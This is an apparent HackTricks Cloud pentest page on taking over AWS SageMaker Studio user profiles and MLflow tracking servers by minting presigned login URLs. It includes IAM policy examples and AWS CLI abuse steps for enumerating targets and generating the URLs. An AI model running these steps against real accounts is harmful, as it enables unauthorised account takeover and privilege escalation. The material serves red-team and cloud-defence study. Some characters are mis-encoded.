HackTricks CloudAWS - SageMaker Unauthorized Access
Reading time: 5 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the š¬ Discord group or the telegram group or follow us on Twitter š¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SageMaker Studio - Account Takeover via CreatePresignedDomainUrl (Impersonate Any UserProfile)
Description
An identity with permission to call sagemaker:CreatePresignedDomainUrl on a target Studio UserProfile can mint a login URL that authenticates directly into SageMaker Studio as that profile. This grants the attacker's browser a Studio session that inherits the profile's ExecutionRole permissions and full access to the profile's EFS-backed home and apps. No iam:PassRole or console access is required.
Requirements
- A SageMaker Studio
Domainand a targetUserProfilewithin it. - The attacker principal needs
sagemaker:CreatePresignedDomainUrlon the targetUserProfile(resourceālevel) or*.
Minimal policy example (scoped to one UserProfile):
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sagemaker:CreatePresignedDomainUrl",
"Resource": "arn:aws:sagemaker:<region>:<account-id>:user-profile/<domain-id>/<user-profile-name>"
}
]
}
Abuse Steps
- Enumerate a Studio Domain and UserProfiles you can target
DOM=$(aws sagemaker list-domains --query 'Domains[0].DomainId' --output text)
aws sagemaker list-user-profiles --domain-id-equals $DOM
TARGET_USER=<UserProfileName>
- Generate a presigned URL (valid ~5 minutes by default)
aws sagemaker create-presigned-domain-url \
--domain-id $DOM \
--user-profile-name $TARGET_USER \
--query AuthorizedUrl --output text
- Open the returned URL in a browser to sign into Studio as the target user. In a Jupyter terminal inside Studio verify the effective identity:
aws sts get-caller-identity
Notes:
--landing-urican be omitted. Some values (e.g.,app:JupyterLab:/lab) may be rejected depending on Studio flavor/version; defaults typically redirect to the Studio home and then to Jupyter.- Org policies/VPC endpoint restrictions may still block network access; the token minting does not require console signāin or
iam:PassRole.
Impact
- Lateral movement and privilege escalation by assuming any Studio
UserProfilewhose ARN is permitted, inheriting itsExecutionRoleand filesystem/apps.
Evidence (from a controlled test)
- With only
sagemaker:CreatePresignedDomainUrlon a targetUserProfile, the attacker role successfully returned anAuthorizedUrllike:
https://studio-d-xxxxxxxxxxxx.studio.<region>.sagemaker.aws/auth?token=eyJhbGciOi...
- A direct HTTP request responds with a redirect (HTTP 302) to Studio, confirming the URL is valid and active until expiry.
SageMaker MLflow Tracking Server - ATO via CreatePresignedMlflowTrackingServerUrl
Description
An identity with permission to call sagemaker:CreatePresignedMlflowTrackingServerUrl for a target SageMaker MLflow Tracking Server can mint a singleāuse presigned URL that authenticates directly to the managed MLflow UI for that server. This grants the same access a legitimate user would have to the server (view/create experiments and runs, and download/upload artifacts in the serverās S3 artifact store) without console access or iam:PassRole.
Requirements
- A SageMaker MLflow Tracking Server in the account/region and its name.
- The attacker principal needs
sagemaker:CreatePresignedMlflowTrackingServerUrlon the target MLflow Tracking Server resource (or*).
Minimal policy example (scoped to one Tracking Server):
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sagemaker:CreatePresignedMlflowTrackingServerUrl",
"Resource": "arn:aws:sagemaker:<region>:<account-id>:mlflow-tracking-server/<tracking-server-name>"
}
]
}
Abuse Steps
- Enumerate MLflow Tracking Servers you can target and pick one name
aws sagemaker list-mlflow-tracking-servers \
--query 'TrackingServerSummaries[].{Name:TrackingServerName,Status:TrackingServerStatus}'
TS_NAME=<tracking-server-name>
- Generate a presigned MLflow UI URL (valid for a short time)
aws sagemaker create-presigned-mlflow-tracking-server-url \
--tracking-server-name "$TS_NAME" \
--expires-in-seconds 300 \
--session-expiration-duration-in-seconds 1800 \
--query AuthorizedUrl --output text
- Open the returned URL in a browser to access the MLflow UI as an authenticated user for that Tracking Server.
Notes:
- The Tracking Server must be in a ready state (e.g.,
Created/Active). If it is stillCreating, the call will be rejected. - The presigned URL is singleāuse and shortālived; generate a new one when needed.
Impact
- Direct access to the managed MLflow UI for the targeted Tracking Server, enabling viewing and modification of experiments/runs and retrieval or upload of artifacts stored in the serverās configured S3 artifact store, within the permissions enforced by the server configuration.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the š¬ Discord group or the telegram group or follow us on Twitter š¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.